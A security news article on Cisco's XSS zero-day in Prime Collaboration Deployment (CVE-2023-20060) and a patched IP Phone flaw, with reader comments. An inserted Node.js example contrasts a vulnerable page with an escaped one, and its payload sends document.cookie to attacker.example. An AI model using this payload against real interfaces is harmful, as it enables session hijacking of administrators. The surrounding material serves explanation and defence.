
Cisco discloses XSS zero-day flaw in server management tool


Cisco disclosed today a zero-day vulnerability in the company’s Prime Collaboration Deployment (PCD) software that can be exploited for cross-site scripting attacks.

This server management utility enables admins to perform migration or upgrade tasks on servers in their organization’s inventory.

Tracked as CVE-2023-20060, the bug was found in the web-based management interface of Cisco PCD 14 and earlier by Pierre Vivegnis of the NATO Cyber Security Centre (NCSC).

Successful exploitation lets an unauthenticated, remote attacker mount a cross-site scripting attack, but it requires user interaction: the victim has to open a crafted link while using the interface.

“This vulnerability exists because the web-based management interface does not properly validate user-supplied input. An attacker could exploit this vulnerability by persuading a user of the interface to click a crafted link,” Cisco explains.

“A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information.”
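The pattern Cisco describes, a management page that copies an attacker-controlled value from a crafted link into its HTML without validating or encoding it, looks like the following in Node.js. This is an added illustration, not Cisco's code: the advisory says nothing about PCD's actual page or parameter names, so the `server` parameter, the `pcd.example.internal` host, the attacker host and every function name here are hypothetical.

```javascript
// Added example of a reflected XSS in a web management page and its fix.
// Generic illustration, not Cisco PCD code; all names below are hypothetical.

// Vulnerable: the "server" query parameter is interpolated into HTML as-is.
function renderStatusPageUnsafe(requestUrl) {
  const url = new URL(requestUrl);
  const server = url.searchParams.get("server") ?? "";
  return `<h1>Status for ${server}</h1>`;
}

// Minimal HTML entity encoding for text placed in element content.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => ({
    "&": "&amp;",
    "<": "&lt;",
    ">": "&gt;",
    '"': "&quot;",
    "'": "&#39;",
  }[ch]));
}

// Hardened: same page, but the untrusted value is encoded before insertion,
// so browser-side it renders as text rather than as markup.
function renderStatusPageSafe(requestUrl) {
  const url = new URL(requestUrl);
  const server = url.searchParams.get("server") ?? "";
  return `<h1>Status for ${escapeHtml(server)}</h1>`;
}

// The "crafted link" an attacker would send to a logged-in admin. URLSearchParams
// percent-encodes the payload in the link; the server decodes it on the way in.
function buildCraftedLink(base, payload) {
  const url = new URL(base);
  url.searchParams.set("server", payload);
  return url.toString();
}

// Crude check used here to show whether a live <script> tag reached the output.
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Constructed payload: exfiltrates the session cookie to an attacker host.
const PAYLOAD =
  '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>';
const CRAFTED_LINK = buildCraftedLink(
  "https://pcd.example.internal/status",
  PAYLOAD,
);

console.log("Crafted link :", CRAFTED_LINK);
console.log("Unsafe render:", renderStatusPageUnsafe(CRAFTED_LINK));
console.log("Safe render  :", renderStatusPageSafe(CRAFTED_LINK));
```

Run it with `node` to see the unencoded `<script>` come straight back out of the unsafe handler while the hardened one returns it as inert text. Output encoding at the point of insertion is the actual fix; input validation and a Content-Security-Policy are worth having on top of it, not instead of it, which is why "does not properly validate user-supplied input" in an advisory usually maps to a missing encoding step in practice.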

Cisco has shared details of the flaw's impact but will not release security updates to address it until next month. No workarounds are available to remove the attack vector in the meantime.

Luckily, the Cisco Product Security Incident Response Team (PSIRT) has yet to find any evidence of malicious use in the wild and is unaware of public exploit code targeting the bug.

Cisco Prime Collaboration Deployment Release | First Fixed Release
14 and earlier                               | 14SU3 (May 2023)

December zero-day patched in January

Cisco has also patched another high-severity IP Phone zero-day (CVE-2022-20968), disclosed in early December 2022, for which exploit code is publicly available.

The company promised security updates would be released in January 2023, and it patched the vulnerability with a new firmware release issued on January 18. However, the advisory has yet to be updated, and the firmware update can only be downloaded with a Cisco account.

Cisco’s PSIRT warned at the time that it’s “aware that proof-of-concept exploit code is available” and that the “vulnerability has been publicly discussed.”

Devices impacted by CVE-2022-20968 include Cisco IP phones running 7800 and 8800 Series firmware version 14.2 and earlier.

Cisco did not provide a workaround for this IP Phone zero-day, but it did point admins to a temporary mitigation: disabling the Cisco Discovery Protocol on affected devices, which then use the Link Layer Discovery Protocol (LLDP) as a fallback to discover their configuration.

“This is not a trivial change and will require diligence on behalf of the enterprise to evaluate any potential impact to devices as well as the best approach to deploy this change in their enterprise,” the company warned at the time.

Update April 27, 14:45 EDT: Revised story to say the IP Phone zero-day was patched in January (the advisory is yet to be updated with this information).

Comments

  • Moo_Cows – 2 days ago

    Unless I’m misunderstanding the vulnerability, Cisco patched the 7800/8800 bug back in January with the release of firmware version 14.2.1.

    https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ipp-oobwrite-8cMF5r7U

  • serghei – 2 days ago

    That’s when they said they’d release the fix, but the advisory is yet to be updated.

    You can find the original version of the advisory at https://web.archive.org/web/20221220191147/https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ipp-oobwrite-8cMF5r7U.

    For comparison, they also say they’ll release Cisco Prime Collaboration Deployment 14SU3 in May 2023 (check the table embedded in this article).

  • Moo_Cows – 2 days ago

    The fixed firmware version 14.2.1 was released on January 18, 2023. We’re running it in our organization.

    https://imgur.com/a/Cijmiza – screenshot of the firmware download page from Cisco (it’s only accessible if you have a Cisco account).

  • serghei – 2 days ago

    Oh, well… It would’ve been nice if they also updated the advisory when they released the fixed firmware.

    Will update the story to correctly tag it as a patched bug. Thanks!

  • Moo_Cows – 2 days ago

    Agreed! Their advisory leaves much to be desired!


Source bleepingcomputer.com
